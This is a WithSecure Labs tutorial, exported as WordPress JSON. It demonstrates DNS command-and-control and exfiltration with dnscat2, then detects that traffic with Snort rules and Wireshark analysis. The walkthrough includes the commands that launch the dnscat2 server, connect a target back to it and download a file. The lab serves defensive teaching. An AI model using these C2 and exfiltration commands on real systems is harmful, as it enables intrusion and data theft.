{"id":10541,"date":"2020-07-15T09:00:00","date_gmt":"2020-07-15T08:00:00","guid":{"rendered":"https:\/\/www.withsecure.com\/resources-hub\/w-labs\/attack-detection-fundamentals-c2-and-exfiltration-lab-2\/"},"modified":"2020-07-15T09:00:00","modified_gmt":"2020-07-15T08:00:00","slug":"attack-detection-fundamentals-c2-and-exfiltration-lab-2","status":"publish","type":"lab_item","link":"https:\/\/www.withsecure.com\/fr\/ressources\/w-labs\/attack-detection-fundamentals-c2-and-exfiltration-lab-2\/","title":{"rendered":"Attack Detection Fundamentals: C2 and Exfiltration &#8211; Lab #2"},"content":{"rendered":"<section\n    class=\"wp-block-one-column-block edwp-block js-wp-block-one-column-block wp-block-one-column-block--content-1 wp-block-one-column-block--meta-sharing layout--spacing-xxxxl-top layout--spacing-xl-bottom\"\n    >\n    <div class=\"wp-block-one-column-block__container\">\n                                                                                                                            <div class='wp-block-one-column-block__meta-sharing-grid'><div class=\"wp-component-content wp-component-content--default wp-block-one-column-block__content fade-in\">\n            <h1 class=\"wp-component-heading text--h2 wp-component-content__title\">\n    Attack Detection Fundamentals: C2 and Exfiltration &#8211; <span class=\"blue-text\">Lab #2<\/span><\/h1>                    <div class=\"wp-component-content__inner\">\n                                                    <div class=\"wp-component-content__meta\">\n                                                                            <span class=\"wp-component-content__meta-categories\">\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Attack Detection                                    <\/span>\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Network Security                                    <\/span>\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Offensive security                                    <\/span>\n                                                            <\/span>\n                                                                                                    <span class=\"wp-component-content__meta-date\">\n                                15 juillet, 2020                            <\/span>\n                                                                    <\/div>\n                                            <\/div>\n                <\/div><section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--content-1 wp-block-sharing-icons--disable-container wp-block-one-column-block__sharing fade-in wp-block-one-column-block__sharing fade-in\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Partager cette information                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/fr\/ressources\/w-labs\/attack-detection-fundamentals-c2-and-exfiltration-lab-2\/&#038;title=Attack%20Detection%20Fundamentals:%20C2%20and%20Exfiltration%20&#8211;%20Lab%20#2\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Partager sur LinkedIn\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Attack Detection Fundamentals: C2 and Exfiltration &#8211; Lab #2&#038;url=https:\/\/www.withsecure.com\/fr\/ressources\/w-labs\/attack-detection-fundamentals-c2-and-exfiltration-lab-2\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"Partager sur X (Twitter)\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n<\/div>                                                                                <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-one-column-block edwp-block js-wp-block-one-column-block wp-block-one-column-block--content-1 layout--spacing-xxxl-bottom\"\n    >\n    <div class=\"wp-block-one-column-block__container\">\n                                                                                                                                    <div class=\"wp-component-image__wrapper wp-block-one-column-block__image fade-in\">\n                    <figure class=\"wp-component-image__figure\">\n                                            <img loading=\"lazy\" decoding=\"async\" width=\"1200\" height=\"800\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_news.jpg.webp\" class=\"wp-component-image\n                            wp-component-image--desktop\n                            wp-component-image--mobile\n                            wp-component-image--ratio-content-25-1 wp-component-image--fit-cover\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_news.jpg.webp 1200w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_news-300x200.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_news-1024x683.jpg.webp 1024w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_news-768x512.jpg.webp 768w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_news-447x298.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_news-219x146.jpg.webp 219w\" sizes=\"auto, (max-width: 1200px) 100vw, 1200px\" \/>                                                    <\/figure>\n                    <\/div>\n                                                                                <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-two-column-block edwp-block js-wp-block-two-column-block wp-block-two-column-block--content-1 wp-block-two-column-block__left--align-y-top wp-block-two-column-block__right--align-y-top wp-block-two-column-block--split-sidebar layout--none-top layout--spacing-xxxl-bottom\"\n    data-block-id=\"block_fcef1eb213d0df3c44e6302d4c5f7021\"\n    >\n    <div class=\"wp-block-two-column-block__container row-load\">\n                                                        <div class=\"wp-block-two-column-block__left\">\n                                    <div class=\"wp-component-authors-list wp-block-two-column-block__authors\">\n                    <p class=\"wp-component-authors-list__title\">\n                Authors            <\/p>\n        \n        <div class=\"wp-component-authors-list__items\">\n                                                <div class=\"wp-component-author-card \">\n    <div class=\"wp-component-author-card__media\">\n                    <span class=\"wp-component-author-card__photo-placeholder\" aria-hidden=\"true\">\n                <svg viewBox=\"0 0 64 64\" role=\"presentation\" focusable=\"false\">\n                    <path d=\"M32 34c-8.1 0-14.7 6.6-14.7 14.7v3.5h29.4v-3.5C46.7 40.6 40.1 34 32 34z\"><\/path>\n                    <path d=\"M32 31.2c6 0 10.9-4.9 10.9-10.9S38 9.4 32 9.4s-10.9 4.9-10.9 10.9S26 31.2 32 31.2z\"><\/path>\n                <\/svg>\n            <\/span>\n            <\/div>\n    <div class=\"wp-component-author-card__content\">\n                    <h3 class=\"wp-component-author-card__name\">Alfie Champion<\/h3>\n        \n                \n            <\/div>\n\n<\/div>\n\n                                                                <div class=\"wp-component-author-card \">\n    <div class=\"wp-component-author-card__media\">\n                    <span class=\"wp-component-author-card__photo-placeholder\" aria-hidden=\"true\">\n                <svg viewBox=\"0 0 64 64\" role=\"presentation\" focusable=\"false\">\n                    <path d=\"M32 34c-8.1 0-14.7 6.6-14.7 14.7v3.5h29.4v-3.5C46.7 40.6 40.1 34 32 34z\"><\/path>\n                    <path d=\"M32 31.2c6 0 10.9-4.9 10.9-10.9S38 9.4 32 9.4s-10.9 4.9-10.9 10.9S26 31.2 32 31.2z\"><\/path>\n                <\/svg>\n            <\/span>\n            <\/div>\n    <div class=\"wp-component-author-card__content\">\n                    <h3 class=\"wp-component-author-card__name\">Jordan LaRose<\/h3>\n        \n                \n            <\/div>\n\n<\/div>\n\n                                    <\/div>\n\n            <\/div>\n<nav\n    class=\"wp-component-content-navigation wp-block-two-column-block__content-nav js-content-navigation\"\n    data-bem-base=\"wp-component-content-navigation\"\n    data-nav-column=\"left\"\n    data-nav-type=\"auto\"\n>\n            <p class=\"wp-component-content-navigation__title\">\n            Content        <\/p>\n    \n    <div class=\"wp-component-content-navigation__mobile\">\n        <label class=\"wp-component-content-navigation__mobile-label\">\n            <span class=\"wp-component-content-navigation__mobile-label-text\">\n                Navigation dans le contenu            <\/span>\n            <select class=\"wp-component-content-navigation__select js-content-navigation-select\">\n                <option value=\"\">\n                    S\u00e9lectionnez une section                <\/option>\n                            <\/select>\n        <\/label>\n    <\/div>\n\n    <div class=\"wp-component-content-navigation__desktop\">\n        <div class=\"wp-component-content-navigation__list-wrapper\">\n            <span\n                class=\"wp-component-content-navigation__indicator js-content-navigation-indicator\"\n                aria-hidden=\"true\"\n            ><\/span>\n            <ul class=\"wp-component-content-navigation__list js-content-navigation-list\">\n                            <\/ul>\n        <\/div>\n    <\/div>\n<\/nav>\n<section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--disable-container wp-block-two-column-block__share wp-block-two-column-block__hide-mobile wp-block-two-column-block__share wp-block-two-column-block__hide-mobile\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Share this story                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/fr\/ressources\/w-labs\/attack-detection-fundamentals-c2-and-exfiltration-lab-2\/&#038;title=Attack%20Detection%20Fundamentals:%20C2%20and%20Exfiltration%20&#8211;%20Lab%20#2\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Partager sur LinkedIn\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Attack Detection Fundamentals: C2 and Exfiltration &#8211; Lab #2&#038;url=https:\/\/www.withsecure.com\/fr\/ressources\/w-labs\/attack-detection-fundamentals-c2-and-exfiltration-lab-2\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"Partager sur X (Twitter)\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n                <\/div>\n                                                <div class=\"wp-block-two-column-block__right\">\n                                <div class=\"wp-component-paragraph wp-block-two-column-block__paragraph \">\n    <p>In the fourth and final part of WithSecure Consulting&#x27;s Attack Detection Fundamentals Workshop series, covering Command and Control (C2) and Exfiltration, we explored a number of attacker techniques for maintaining communication with an implant, blending in with corporate network traffic.<\/p>\n<p>We also explored the detection strategies that can be employed to spot these channels using our own detection stacks, including ways to spot these channels being used for exfiltration. As with previous workshops, the following blog provides a second step-by-step guide to recreating the demos from that C2 and Exfiltration workshop, as well as exercises to further the reader&#x27;s understanding of the concepts shown. A recording of the workshop can be found <a href=\"https:\/\/youtu.be\/dHyU0Q32_v8\" target=\"_blank\" rel=\"noopener\">here<\/a>.<\/p>\n<p>In the previous <a href=\"https:\/\/labs.withsecure.com\/blog\/attack-detection-fundamentals-c2-and-exfiltration-lab-1\/\" target=\"_blank\" rel=\"noopener\">lab<\/a>, we looked at HTTP C2 channels. We used PowerShell Empire, a classic post-exploitation framework that has been a popular choice for threat actors since its <a href=\"https:\/\/www.youtube.com\/watch?v=Pq9t59w0mUI\" target=\"_blank\" rel=\"noopener\">introduction<\/a> back in 2015. We looked at opportunities to detect C2 channels based on several static and behavioural traits &#8211; default URIs, user agents, server responses and beaconing. We also created our first Snort rule to detect Empire&#x27;s default IIS server response. In this second lab, we&#x27;ll look at another vector for command and control, DNS. DNS is typically permitted out of corporate environments, and we can use it for C2 and exfiltration. DNS C2 is a feature of many popular frameworks, including <a href=\"https:\/\/www.cobaltstrike.com\/help-dns-beacon\" target=\"_blank\" rel=\"noopener\">Cobalt Strike<\/a>. We&#x27;ll use <a href=\"https:\/\/github.com\/iagox86\/dnscat2\" target=\"_blank\" rel=\"noopener\">dnscat2<\/a> for this lab, another framework that will allow us to demonstrate the basic principles of DNS command and control traffic. Start a packet capture in Wireshark, and let&#x27;s get started!<\/p>\n<h2>References<\/h2>\n<ul>\n<li><a href=\"https:\/\/www.sans.org\/reading-room\/whitepapers\/dns\/detecting-dns-tunneling-34152\" target=\"_blank\" rel=\"noopener\">SANS &#8211; Detecting DNS Tunnelling<\/a><\/li>\n<\/ul>\n<p>DISCLAIMER: Set up of the tools and the testing environment might not be covered comprehensively within this lab. We will assume basic familiarity with Linux\/Windows command line and the ability of the reader to deploy the necessary frameworks. For that, it is recommended to follow the suggested references for the official tutorials and walkthrough published by the framework&#x27;s author.<\/p>\n<h2>Required Tools<\/h2>\n<ul>\n<li>Wireshark<\/li>\n<li>dnscat2<\/li>\n<li>Snort<\/li>\n<li>2 x VMs (Disable AV and Firewall)<\/li>\n<\/ul>\n<h2>Walkthrough<\/h2>\n<h3>1 &#8211; Executing dnscat2<\/h3>\n<p>To launch DNSCat use the following command:<\/p>\n<pre><code class=\"language-bash\">ruby -W0 dnscat2.rb --security=open --no-cache<\/code><\/pre>\n<p>This sets up dnscat2 with no security enabled and without a FQDN.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/dnscat.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Then, on the Windows target host, we will need to download the dnscat2 client and launch the following command<\/p>\n<pre><code class=\"language-bash\">.\/dnscat --dns server=[local IP], port=53 \u2013secret[unique secret key]<\/code><\/pre>\n<p>This will allow the target machine to connect back to our attacking machine.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/dnscat2.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>To interact with the first window, run the following command:<\/p>\n<pre><code class=\"language-bash\">window -i 1<\/code><\/pre>\n<p>Then, issue a download command with the following:<\/p>\n<pre><code class=\"language-bash\">download [path to target file]<\/code><\/pre>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/dnscat3.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Great, we&#x27;ve established a DNS C2 channel and successfully exfiltrated a file from our target host. Now, to explore and detect this activity!<\/p>\n<h3>2 &#8211; Detection<\/h3>\n<p>Let&#x27;s open Wireshark and analyse the packet capture of the above activity.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/dns-queries-1.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Immediately, we can see something noteworthy here &#8211; Dnscat2 prefixes it&#x27;s DNS requests with &quot;dnscat&quot;! Obviously, this isn&#x27;t going to solve all our DNS C2 problems as a defender, but we can certainly detect default dnscat2 usage.<\/p>\n<p>As we&#x27;ve done previously, we can create a simple Snort rule to detect this activity.<\/p>\n<pre><code class=\"language-bash\">alert udp any 53 &lt;&gt; any any (msg: &quot;Possible DNSCat activity&quot; ; sid:1000001 ; content:&quot;dnscat&quot;; )<\/code><\/pre>\n<p>Running this rule against the packet capture with the following command, we should see you our dnscat2 traffic alerted upon:<\/p>\n<pre><code class=\"language-bash\">snort -A console -K none -q -r .\/lab\/dnscat_capture.pcap -c dnscat2.rule<\/code><\/pre>\n<pre><code class=\"language-bash\">06\/28-12:06:50.884688 [**] [1:1000001:0] Possible DNSCat activity [**] [Priority: 0] {UDP} 192.168.1.83:59976 -&gt; 192.168.1.80:53\n06\/28-12:06:50.885918 [**] [1:1000001:0] Possible DNSCat activity [**] [Priority: 0] {UDP} 192.168.1.80:53 -&gt; 192.168.1.83:59976\n06\/28-12:06:51.887389 [**] [1:1000001:0] Possible DNSCat activity [**] [Priority: 0] {UDP} 192.168.1.83:59976 -&gt; 192.168.1.80:53<\/code><\/pre>\n<p>If we compare our dnscat2 traffic to benign DNS lookups, we can see that the size of the requests also stands out.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/dns-queries-3.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Of course, we&#x27;re using a simple lab environment, an enterprise network would likely present more false positives. But nevertheless we could use a Snort rule like the below to detect DNS requests above a given size (in this case greater than 100 bytes):<\/p>\n<pre><code class=\"language-bash\">alert udp any 53 &lt;&gt; any any (msg: &quot;Possible DNS C2 activity&quot; ; sid:1000001 ; dsize:&gt;100;)<\/code><\/pre>\n<p>If we take another look at the Wireshark captures of standard traffic and dnscat2, we can also see uncommon record types being requested, including MX and TXT. Compared to the standard A and AAAA records (IPv4 and IPv6 address lookups respectively), these records are anomalous and could be worth investigating, particularly if in close proximity with other rare record types.<\/p>\n<h2>Conclusions<\/h2>\n<p>In the second lab, we made use of dnscat2 to explore detection opportunities for attackers attempted to hide their command and control channels in DNS traffic. We using our Wireshark packet captures we explored detections using default strings, anomalous DNS request sizes and record types.<\/p>\n<p>The main takeaways from this second lab are:<\/p>\n<ul>\n<li>A simple example of DNS command and control.<\/li>\n<li>Opportunities to detect DNS C2 channels based on attributes of the DNS requests, including anomalous record types.<\/li>\n<li>Further use of Snort to produce alerts for DNS C2 traffic.<\/li>\n<\/ul>\n<p>Now, let&#x27;s take things further and look at hiding our command and control with a legitimate service &#8211; <a href=\"https:\/\/labs.withsecure.com\/blog\/attack-detection-fundamentals-c2-and-exfiltration-lab-3\/\" target=\"_blank\" rel=\"noopener\">Dropbox<\/a>!<\/p>\n<\/div>\n<section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--disable-container wp-block-two-column-block__share wp-block-two-column-block__mobile-after-right wp-block-two-column-block__share wp-block-two-column-block__mobile-after-right\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Share this story                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/fr\/ressources\/w-labs\/attack-detection-fundamentals-c2-and-exfiltration-lab-2\/&#038;title=Attack%20Detection%20Fundamentals:%20C2%20and%20Exfiltration%20&#8211;%20Lab%20#2\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Partager sur LinkedIn\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Attack Detection Fundamentals: C2 and Exfiltration &#8211; Lab #2&#038;url=https:\/\/www.withsecure.com\/fr\/ressources\/w-labs\/attack-detection-fundamentals-c2-and-exfiltration-lab-2\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"Partager sur X (Twitter)\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n                <\/div>\n                        <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-cta-banner edwp-block js-wp-block-cta-banner wp-block-cta-banner--style-icon wp-block-cta-banner--no-image layout--spacing-xxxl-top layout--spacing-xxxl-bottom\"\n    >\n    <div class=\"wp-block-cta-banner__container\">\n        <div class=\"wp-block-cta-banner__box row-load\">\n            <div class=\"wp-component-content wp-component-content--help-text wp-component-content--dark wp-block-cta-banner__content\">\n                        <div class=\"wp-component-content__inner\">\n                <h2 class=\"wp-component-heading text--h2 wp-component-heading--dark wp-component-content__title\">\n    What <span class=\"blue-text\">next?<\/span><\/h2>                                    <div class=\"wp-component-content__content wysiwyg wysiwyg--dark\">\n                        <div class=\"wp-component-paragraph wp-component-paragraph--dark\">\n    <p class=\"text--p-medium\">Discover WithSecure\u2122 Elements Exposure Management.<br \/>\n&#8211; No credit card required. No obligations.No complexity.<\/p>\n<\/div>\n                    <\/div>\n                            <\/div>\n                            <div class=\"wp-component-content__buttons\">\n                <a class=\"wp-component-button btn btn--primary btn--dark\" href=\"https:\/\/www.withsecure.com\/en\/contact-us\/\">Contact us<\/a>            <\/div>\n                <\/div>                    <\/div>\n    <\/div>\n<\/section>\n\n\n\n\n<section\n    class=\"wp-block-cards edwp-block wp-block-cards--col-3 js-wp-block-cards wp-block-cards--show-overflow wp-block-cards--auto-slides-per-view layout--spacing-xxxl-top layout--spacing-xxxl-bottom\"\n    >\n    <div class=\"wp-block-cards__container\">\n        <div class=\"wp-component-content wp-component-content--default wp-block-cards__content\">\n            <h2 class=\"wp-component-heading text--h2 wp-component-content__title\">\n    Related <span class=\"blue-text\">Labs content<\/span><\/h2>                    <div class=\"wp-component-content__inner\">\n                                    <div class=\"wp-component-content__content wysiwyg\">\n                        <div class=\"wp-component-paragraph \">\n    <p class=\"text--p-medium\"><span data-teams=\"true\">Find related content relating to this topic.<\/span><\/p>\n<\/div>\n                    <\/div>\n                                                            <\/div>\n                <\/div>                            <div\n                class=\"swiper wp-block-cards__swiper js-wp-block-cards-swiper\"\n                data-slides-per-view-desktop=\"auto\"\n                data-slides-per-view-tablet=\"auto\"\n                data-slides-per-view-mobile=\"auto\"\n            >\n                <div class=\"swiper-wrapper wp-block-cards__swiper-wrapper row-load\">\n                                            <div class=\"swiper-slide wp-block-cards__slide\">\n                            <div class=\"wp-component-card-insight wp-block-cards__card wp-component-card-insight--highlighted\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img loading=\"lazy\" decoding=\"async\" width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp\" class=\"wp-component-card-insight__image\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp 618w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-300x214.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-447x318.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-205x146.jpg.webp 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/Labs<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Software Protection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Threat intelligence<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">DarkGate Rises: New version of DarkGate malware hunts like a Duck but bites like a RAT<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">Source: https:\/\/labs.withsecure.com\/publications\/darkgate-rises<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary btn--dark wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/fr\/ressources\/w-labs\/darkgate-rises\/\">En savoir plus<\/a>            <\/div>\n            <\/div>\n<\/div>                        <\/div>\n                                            <div class=\"swiper-slide wp-block-cards__slide\">\n                            <div class=\"wp-component-card-insight wp-block-cards__card\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img loading=\"lazy\" decoding=\"async\" width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp\" class=\"wp-component-card-insight__image\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp 618w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-300x214.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-447x318.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-205x146.jpg.webp 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/Labs<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Software Protection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Threat intelligence<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">Reverse engineering a Lumma infection<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">Lumma is an information stealer that the WithSecure Detection and Response Team (DRT) have encountered several times. It has seen wider use over the past couple of years, and makes for an interesting threat to monitor.<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/fr\/ressources\/w-labs\/reverse-engineering-a-lumma-infection\/\">En savoir plus<\/a>            <\/div>\n            <\/div>\n<\/div>                        <\/div>\n                                            <div class=\"swiper-slide wp-block-cards__slide\">\n                            <div class=\"wp-component-card-insight wp-block-cards__card\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img loading=\"lazy\" decoding=\"async\" width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp\" class=\"wp-component-card-insight__image\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp 618w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-300x214.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-447x318.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-205x146.jpg.webp 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/Labs<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">AI security<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Software Protection<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">Machine learning-driven malware analysis<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">With the rapid emergence of new malware variants, accurately classifying and attributing malware samples has become more challenging than ever<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/fr\/ressources\/w-labs\/machine-learning-driven-malware-analysis\/\">En savoir plus<\/a>            <\/div>\n            <\/div>\n<\/div>                        <\/div>\n                                    <\/div>\n                <div class=\"wp-block-cards__nav fade-in\">\n                    <div class=\"wp-block-cards__pagination js-wp-block-cards-pagination\">\n                    <\/div>\n                    <div class=\"wp-block-cards__nav-arrow js-wp-block-cards-nav-prev\">\n                        <svg class='edwp-icon edwp-icon--reg js-icon ' aria-hidden='true'>\n                <use xlink:href='#chevron'><\/use>\n            <\/svg>                    <\/div>\n                    <div class=\"wp-block-cards__nav-arrow js-wp-block-cards-nav-next\">\n                        <svg class='edwp-icon edwp-icon--reg js-icon ' aria-hidden='true'>\n                <use xlink:href='#chevron'><\/use>\n            <\/svg>                    <\/div>\n                <\/div>\n            <\/div>\n                                    <\/div>\n<\/section>\n","protected":false},"excerpt":{"rendered":"<p>In this second lab, we&rsquo;ll look at another vector for command and control, DNS. DNS is typically permitted out of corporate environments, and we can use it for C2 and exfiltration.<\/p>\n","protected":false},"author":3,"featured_media":0,"template":"","categories":[306,343,379],"labs_content_type":[309],"class_list":["post-10541","lab_item","type-lab_item","status-publish","hentry","category-attack-detection","category-network-security","category-offensive-security"],"acf":[],"card":"<div class=\"wp-component-card-insight js-card-link wp-component-card-insight--highlighted\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder.jpg\" class=\"wp-component-card-insight__image\" alt=\"\" decoding=\"async\" loading=\"lazy\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder.jpg 618w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-300x214.jpg 300w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-447x318.jpg 447w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-205x146.jpg 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/Labs<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Network Security<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Offensive security<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">Attack Detection Fundamentals: C2 and Exfiltration &#8211; Lab #2<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">In this second lab, we&#039;ll look at another vector for command and control, DNS. DNS is typically permitted out of corporate environments, and we can use it for C2 and exfiltration.<\/p>\n                            <div 